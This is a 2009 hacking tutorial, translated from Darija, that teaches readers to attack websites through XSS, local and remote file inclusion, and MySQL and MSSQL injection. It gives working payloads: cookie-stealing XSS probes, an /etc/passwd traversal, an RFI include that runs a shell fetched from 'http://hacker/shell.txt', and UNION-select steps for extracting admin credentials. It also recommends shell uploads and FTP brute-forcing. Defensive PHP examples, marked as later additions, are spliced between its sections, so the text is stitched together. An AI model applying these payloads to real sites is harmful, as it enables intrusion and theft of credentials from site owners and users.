#####################################################################
## [Morocco] Web Vulnerabilities Exploiting ##
## -+-+-+-+-+- ##
## Created By Mr.aFiR (Moroccan Hacker) ##
## Email: q-_@hotmail.com ##
## Website: www.aFiR.me ##
## (c) -- 18/12/2oo9 ##
#####################################################################
# To read this with proper formatting, open it in Notepad++ & select "MS INI file" from the Language menu.
#
##-Contents
| #
| #-INTRODUCTION
| #-BODY
| | #
| | #-XSS (all)
| | #-LFI (php)
| | #-RFI (php)
| | #-MySQLi (php)
| | #-MsSQLi (asp,aspx)
| |
| #-CONCLUSION
| #-Greetings
|
|-> In the name of God, let's begin :
[!] I. INTRODUCTION :
How many times have we opened some site, got an error on the page
and understood nothing of it (this goes for some people :) ).
Today we are here to sort that problem out, so that you learn how to deal
with errors, especially in PHP.
Come on, let's get started, with God's blessing.
[!] II. BODY :
[~] a. XSS (all):
XSS (Cross Site Scripting) is the easiest vulnerability & it exists in a lot of sites,
including big ones like banks or large companies such as hotmail &
facebook. And XSS is easy, just pay a little attention with me :
Ex.:
sometimes we find a link like this :
http://server/login.php?message=Invalid Login
& we find that "Invalid Login" written somewhere in the page.
This means we can control that text & change it just from the link.
Let's try :
http://server/login.php?message=<script>alert('aFiR');</script>
if it goes through and pops up a message window containing "aFiR", that is what
is called XSS, because with it you can take the cookies of the admin or the users
of a site.
Uses of XSS : * stealing cookies with it (Cookies Stealing)
* putting a login iframe in the page (iframe Attacks)
* redirecting to your scam page (Phishing Redirections)
We are done with this one. I hope you understood something, otherwise go drink the sea.
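The fix for the reflected "message" parameter above, as an added example that is not part of the original paper: the vulnerable echo next to two hardened renderers. The function names, the message keys and their texts are assumptions made for the illustration.

```php
<?php
// Added example (not from the original paper). Function names, message keys
// and message texts are assumptions.

// Fixed texts the login page may show; the URL carries only a short key.
const LOGIN_MESSAGES = [
    'invalid' => 'Invalid Login',
    'expired' => 'Session expired, please log in again',
];

// VULNERABLE pattern the paper describes: the parameter is echoed as-is,
// so markup placed in the URL becomes markup in the page.
function render_message_vulnerable(string $message): string
{
    return '<p class="msg">' . $message . '</p>';
}

// Output encoding: <, >, &, " and ' are turned into entities, so the
// browser displays the text instead of parsing it.
function render_text_encoded(string $text): string
{
    $safe = htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="msg">' . $safe . '</p>';
}

// HARDENED: the parameter is only a key into the allow-list; unknown keys
// render nothing, and the chosen text is still encoded on output.
function render_message_safe(string $key): string
{
    if (!isset(LOGIN_MESSAGES[$key])) {
        return '';
    }
    return render_text_encoded(LOGIN_MESSAGES[$key]);
}

// Constructed sample input: the probe string quoted in the paper.
$probe = "<script>alert('aFiR');</script>";

echo "vulnerable : ", render_message_vulnerable($probe), "\n";
echo "encoded    : ", render_text_encoded($probe), "\n";
echo "allow-list : ", render_message_safe($probe), "\n";
echo "valid key  : ", render_message_safe('invalid'), "\n";
```

Enabling the `session.cookie_httponly` setting additionally keeps the session cookie out of reach of page scripts, which limits the cookie theft the paper lists as the first use of XSS.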
[~] b. LFI (php):
LFI (Local File Include): this one is a bit weak, but even so it is useful on some
servers, because with it we can read any file provided it is not PHP.
Ex.:
http://server/index.php?lang=fr
we change it to :
http://server/index.php?lang=aFiR
If it gives you an error like this :
Warning : include('languages/aFiR.php') .../home/user/www/index.php on line x
require('languages/aFiR.php') .../home/user/www/index.php on line x
then you can exploit it & read "/etc/passwd"
http://server/index.php?lang=../../../../etc/passwd%00
if safe_mode=OFF it will print out the server's users for you
& that "%00" is what we use to turn ".php" into NULL, meaning it does not stay on the end.
The use of this vuln is that we read /etc/passwd & use it for an
FTP Brute Force Attack, with which we can get FTP logins.
If you did not understand this one, switch off that pc and get out of there | GO! | :D
[~] c. RFI (php):
RFI (Remote File Include): this is the opposite of the first one, and it is either white or black.
In its error there is no directory at all, & here we can also do LFI.
Ex.:
http://server/index.php?page=news
we change it to :
http://server/index.php?page=aFiR
it gives an error like this :
Warning : include('aFiR.php') ...
Warning : require('aFiR.php') ...
this means it may be RFI
back to the link :
http://server/index.php?page=http://hacker/shell.txt?
if the shell gets executed for you, all is well; otherwise Safe_mode=ON :s
& to turn ".php" into NULL in RFI we put "?" at the end of the link
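Both include sections above (LFI and RFI) come from the same mistake, a request parameter that ends up inside the path given to include()/require(). The following added example, which is not code from the original paper, resolves the parameter through a fixed map instead; the directory layout, file names and function name are assumptions.

```php
<?php
// Added example (not from the original paper). The demo directory, the
// language files and resolve_language_file() are assumptions.

// Constructed demo tree so the script runs stand-alone.
$base = sys_get_temp_dir() . '/include_demo_' . getmypid();
@mkdir("$base/languages", 0700, true);
file_put_contents("$base/languages/fr.php", "<?php return 'Bonjour';");
file_put_contents("$base/languages/en.php", "<?php return 'Hello';");

// VULNERABLE pattern behind the warnings quoted above:
//   include('languages/' . $_GET['lang'] . '.php');

// HARDENED: the parameter is only a key into a fixed map. The file name
// comes from the map, never from the request, and the resolved path must
// still sit directly under languages/.
function resolve_language_file(string $base, string $lang): ?string
{
    static $allowed = ['fr' => 'fr.php', 'en' => 'en.php'];
    if (!isset($allowed[$lang])) {
        return null; // unknown key: the filesystem is never touched
    }
    $dir  = realpath("$base/languages");
    $path = realpath("$base/languages/" . $allowed[$lang]);
    if ($dir === false || $path === false) {
        return null; // directory or file missing
    }
    if (strncmp($path, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return null; // defence in depth, e.g. a symlink pointing elsewhere
    }
    return $path;
}

// Constructed inputs: one legitimate value plus the request shapes from the paper.
$inputs = ['fr', 'aFiR', "../../../../etc/passwd\0", 'http://hacker/shell.txt?'];
foreach ($inputs as $lang) {
    $file   = resolve_language_file($base, $lang);
    $result = $file === null ? 'rejected' : 'include ' . basename($file);
    printf("%-34s => %s\n", json_encode($lang), $result);
}
```

On the configuration side, `allow_url_include` has defaulted to Off since PHP 5.2, and PHP 5.3.4 and later reject paths containing a NUL byte, so the "%00" and remote-URL variants depend on old or loosened setups; the allow-list is what removes the bug itself.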
[~] d. MySQLi (php):
MySQL Injection may look hard to you if you have never worked with it, but it really is easy.
When you go to some site, for example at the link /news.php?id=9
and you change the link to /news.php?id=9' an error will come up !
It comes from the programmer not putting any conditions on $id !
& writing it directly like this :
$query = mysql_query("SELECT * FROM news WHERE id=$id");
meaning we can change the course of this query & use it to get the admin's login
the first thing we look for is the number of columns that we will put after "union select"
we do /news.php?id=9 order by 1-- and we keep going, I mean we keep increasing that "1"
until the error comes up; for example, if the error came up when we reached "14", the number of columns is "13"
now that we know "13" is the number of columns, we do :
/news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--
now we will know the affected columns, which are the numbers that show up in the page
now comes the turn of guessing the name of the table that holds the admin's login
/news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from table_name--
table_name is something we guess ourselves; it can be admin, users, user, administrator ...
when we try guesses, as soon as the error disappears = the guess is right ;)
After that comes guessing the admin's login and password, for example if 4 shows up in the page:
/news.php?id=-9 union select 1,2,3,col_name,5,6,7,8,9,10,11,12,13 from table_name--
col_name is the guess for the login or the password :
Login : login, user, username, user_name, name, auth,...
Password : password, pass, passwd,...
Once we know the login we look for the Admin Panel, from which we can upload our shell.
 ________________________________________________________________________________
|* These are commands specific to MySQL only :                                   |
|________________________________________________________________________________|
| version()   = tells us the version of the MySQL server                         |
| datadir()   = tells us the path of mysql on the server                         |
| concat()    = merges several columns into 1 column Ex: concat(user,0x3a,pass)  |
| load_file() = reads files Ex: load_file('/etc/passwd')                         |
|________________________________________________________________________________|
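The root cause named above is that $id goes into the query text with no conditions on it. As an added example, not part of the original paper, here is the same lookup with the id validated and bound as a parameter; it uses PDO with an in-memory SQLite database so it runs offline (assumption: the pdo_sqlite extension is available), and the table contents and the function name find_news() are assumptions.

```php
<?php
// Added example (not from the original paper). The sample row, the SQLite
// backend and find_news() are assumptions; with MySQL only the DSN changes.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO news (id, title) VALUES (9, 'Constructed sample article')");

// VULNERABLE pattern from the paper: $id is pasted into the SQL text, so
// whatever follows the number is parsed as SQL.
//   $query = mysql_query("SELECT * FROM news WHERE id=$id");

// HARDENED: accept only a positive integer, then bind it as a parameter.
// The statement text is fixed, so the value cannot extend the query.
function find_news(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // rejected before any SQL runs, so no database error reaches the page
    }
    $stmt = $pdo->prepare('SELECT id, title FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a normal id and the request shapes shown in the paper.
$inputs = [
    '9',
    "9'",
    '9 order by 1--',
    '-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--',
];
foreach ($inputs as $raw) {
    $row = find_news($pdo, $raw);
    printf("%-50s => %s\n", $raw, $row === null ? 'no row' : $row['title']);
}
```

Turning `display_errors` off in production removes the error text the paper uses as its signal, but it is the bound parameter that closes the hole.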
[~] e. MsSQLi (asp,aspx):
As for MsSQLi (MicroSoft SQL injection), we follow the same steps as MySQLi, with just a few conditions :
1. "union select" = "union all select" (a small difference).
2. "--" = "#" (the comment part, used to cancel whatever comes after our query).
3. In MsSQL the numbers of the affected columns do not show up until we guess table_name.
4. Here we do not work with the mysql commands I gave you above.
Now we are done; the good stuff is sold and gone.
[!] III. CONCLUSION :
I hope you understood something from this course in Darija :) !
I wrote the hell out of it, like an Arabic composition essay :D !
Anyone who did not understand had better run home to his mother ! GO ON, RUN TO YOUR MOM ! hhhhhhhhh
I put this stuff together in Darija, firstly so that the kids of the country understand it & secondly so that
none of those monkeys, pardon the word, understand it and they end up like donkeys
(a bumpkin understanding nothing) :) all they are missing is the ears.
One last thing: you are going to get up from that pc, go to sleep thinking about
all this, and when you wake up in the morning get on the pc & try out everything you put into your head,
so get out of there before I come out of the screen at you :D.
Go on, off with you !
[!] IV. GREETINGS :
Respect to you and to everyone who read this paper & I hope you like it & understand it well.
Anyone who did not understand something, send your message through my website ;)
Finally, respect to all my friends, among them :
"Dr.Crypter(my buddy), Love511(my uncle), Dr.BoB-Hacker(my friend), ****(MyLove)..."
Whoever I forgot to name here, do not worry, you are in my thoughts ;)
See you next time with something new ;)
---------------------------------------------------------------------------------------------------
[x] Author : aFiR Abdel (Mr.aFiR)
[x] Email : q-_[at]hotmail[dot]com
[x] Website : www.aFiR.me
# If you have something to tell me, just contact me ;)
---------------------------------------------------------------------------------------------------